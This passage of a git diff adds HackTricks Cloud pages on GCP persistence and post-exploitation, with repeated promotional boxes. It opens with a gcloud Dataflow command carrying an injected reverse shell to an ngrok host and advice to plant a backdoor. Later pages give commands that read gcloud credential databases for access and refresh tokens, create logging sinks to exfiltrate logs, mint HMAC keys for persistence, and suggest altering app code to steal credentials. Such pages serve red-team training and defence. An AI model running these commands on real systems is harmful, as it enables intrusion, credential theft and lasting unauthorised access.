+ --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
+ --region=us-central1
+```
+
+**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it.
+
+Then, next time the job is executed, the compromised container built will be run:
+
+```bash
+# Run template
+gcloud dataflow $NAME_TEMPLATE run testing \
+ --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \
+ --parameters=output="gs://$REPOSITORY/out" \
+ --region=us-central1
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
new file mode 100644
index 0000000000..9710f452c3
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
@@ -0,0 +1,47 @@
+# GCP - Filestore Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Filestore
+
+For more information about Filestore check:
+
+{% content-ref url="../gcp-services/gcp-filestore-enum.md" %}
+[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md)
+{% endcontent-ref %}
+
+### Give broader access and privileges over a mount
+
+An attacker could **give himself more privileges and ease the access** to the share in order to maintain persistence over the share, find how to perform this actions in this page:
+
+{% content-ref url="gcp-filestore-persistence.md" %}
+[gcp-filestore-persistence.md](gcp-filestore-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
new file mode 100644
index 0000000000..05deeb7faa
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
@@ -0,0 +1,49 @@
+# GCP - Logging Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Logging
+
+Find more information about Logging in:
+
+{% content-ref url="../gcp-services/gcp-logging-enum.md" %}
+[gcp-logging-enum.md](../gcp-services/gcp-logging-enum.md)
+{% endcontent-ref %}
+
+### `logging.sinks.create`
+
+Create a sink to exfiltrate the logs to an attackers accessible destination:
+
+{% code overflow="wrap" %}
+```bash
+gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
new file mode 100644
index 0000000000..848dcdb7a7
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
@@ -0,0 +1,137 @@
+# GCP - Token Persistance
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Authenticated User Tokens
+
+To get the **current token** of a user you can run:
+
+{% code overflow="wrap" %}
+```bash
+sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
+```
+{% endcode %}
+
+Check in this page how to **directly use this token using gcloud**:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#id-6440-1" %}
+
+To get the details to **generate a new access token** run:
+
+{% code overflow="wrap" %}
+```bash
+sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
+```
+{% endcode %}
+
+It's also possible to find refresh tokens in **`$HOME/.config/gcloud/application_default_credentials.json`** and in **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
+
+To get a new refreshed access token with the **refresh token**, client ID, and client secret run:
+
+{% code overflow="wrap" %}
+```bash
+curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
+```
+{% endcode %}
+
+The refresh tokens validity can be managed in **Admin** > **Security** > **Google Cloud session control**, and by default it's set to 16h although it can be set to never expire:
+
+<figure><img src="../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
+
+### Auth flow
+
+The authentication flow when using something like `gcloud auth login` will open a prompt in the browser and after accepting all the scopes the browser will send a request such as this one to the http port open by the tool:
+
+```
+/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1
+```
+
+Then, gcloud will use the state and code with a some hardcoded `client_id` (`32555940559.apps.googleusercontent.com`) and **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) to get the **final refresh token data**.
+
+{% hint style="danger" %}
+Note that the communication with localhost is in HTTP, so it it's possible to intercept the data to get a refresh token, however this data is valid just 1 time, so this would be useless, it's easier to just read the refresh token from the file.
+{% endhint %}
+
+### OAuth Scopes
+
+You can find all Google scopes in [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) or get them executing:
+
+{% code overflow="wrap" %}
+```bash
+curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
+```
+{% endcode %}
+
+It's possible to see which scopes the application that **`gcloud`** uses to authenticate can support with this script:
+
+```bash
+curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do 
+    echo -ne "Testing $scope         \r"
+    if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
+        echo ""
+        echo $scope
+    fi
+done
+```
+
+After executing it it was checked that this app supports these scopes:
+
+```
+https://www.googleapis.com/auth/appengine.admin
+https://www.googleapis.com/auth/bigquery
+https://www.googleapis.com/auth/cloud-platform
+https://www.googleapis.com/auth/compute
+https://www.googleapis.com/auth/devstorage.full_control
+https://www.googleapis.com/auth/drive
+https://www.googleapis.com/auth/userinfo.email
+```
+
+it's interesting to see how this app supports the **`drive`** scope, which could allow a user to escalate from GCP to Workspace if an attacker manages to force the user to generate a token with this scope.
+
+**Check how to** [**abuse this here**](../gcp-to-workspace-pivoting/#abusing-gcloud)**.**
+
+### Service Accounts
+
+Just like with authenticated users, if you manage to **compromise the private key file** of a service account you will be able to **access it usually as long as you want**.\
+However, if you steal the **OAuth token** of a service account this can be even more interesting, because, even if by default these tokens are useful just for an hour, if the **victim deletes the private api key, the OAuh token will still be valid until it expires**.
+
+### Metadata
+
+Obviously, as long as you are inside a machine running in the GCP environment you will be able to **access the service account attached to that machine contacting the metadata endpoint** (note that the Oauth tokens you can access in this endpoint are usually restricted by scopes).
+
+### Remediations
+
+Some remediations for these techniques are explained in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
+
+### References
+
+* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
+* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md
new file mode 100644
index 0000000000..09a46acea9
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md
@@ -0,0 +1,48 @@
+# GCP - Secret Manager Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Secret Manager
+
+Find more information about Secret Manager in:
+
+{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %}
+[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md)
+{% endcontent-ref %}
+
+### Rotation misuse
+
+An attacker could update the secret to:
+
+* **Stop rotations** so the secret won't be modified
+* **Make rotations much less often** so the secret won't be modified
+* **Publish the rotation message to a different pub/sub**
+* **Modify the rotation code being executed.** This happens in a different service, probably in a Cloud Function, so the attacker will need privileged access over the Cloud Function or any other service.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md
new file mode 100644
index 0000000000..ada06789dd
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md
@@ -0,0 +1,64 @@
+# GCP - Storage Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Storage
+
+For more information about Cloud Storage check:
+
+{% content-ref url="../gcp-services/gcp-storage-enum.md" %}
+[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md)
+{% endcontent-ref %}
+
+### `storage.hmacKeys.create`
+
+You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create).
+
+```bash
+# Create key
+gsutil hmac create <sa-email>
+
+# Configure gsutil to use it
+gsutil config -a
+
+# Use it
+gsutil ls gs://[BUCKET_NAME]
+```
+
+Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
+
+### Give Public Access
+
+**Making a bucket publicly accessible** is another way to maintain access over the bucket. Check how to do it in:
+
+{% content-ref url="../gcp-post-exploitation/gcp-storage-post-exploitation.md" %}
+[gcp-storage-post-exploitation.md](../gcp-post-exploitation/gcp-storage-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
new file mode 100644
index 0000000000..a802993e7c
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
@@ -0,0 +1,2 @@
+# GCP - Post Exploitation
+
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
new file mode 100644
index 0000000000..5c17fd3ec3
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md
@@ -0,0 +1,70 @@
+# GCP - App Engine Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## `App Engine`
+
+For information about App Engine check:
+
+{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %}
+[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md)
+{% endcontent-ref %}
+
+### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush`
+
+With these permissions it's possible to:
+
+* Add a key
+* List keys
+* Get a key
+* Delete
+
+{% hint style="danger" %}
+However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, of from the a**pp engine running app**.
+
+If you know easier ways to use these permissions send a Pull Request!
+{% endhint %}
+
+### `logging.views.access`
+
+With this permission it's possible to **see the logs of the App**:
+
+```bash
+gcloud app logs tail -s <name>
+```
+
+### Read Source Code
+
+The source code of all the versions and services are **stored in the bucket** with the name **`staging.<proj-id>.appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**.
+
+### Modify Source Code
+
+Modify source code to steal credentials if they are being sent or perform a defacement web attack.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md
new file mode 100644
index 0000000000..4eb1940063
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md
@@ -0,0 +1,47 @@
+# GCP - Artifact Registry Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %}
+[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md)
+{% endcontent-ref %}
+
+### Privesc
+
+The Post Exploitation and Privesc techniques of Artifact Registry were mixed in:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-artifact-registry-privesc.md" %}
+[gcp-artifact-registry-privesc.md](../gcp-privilege-escalation/gcp-artifact-registry-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
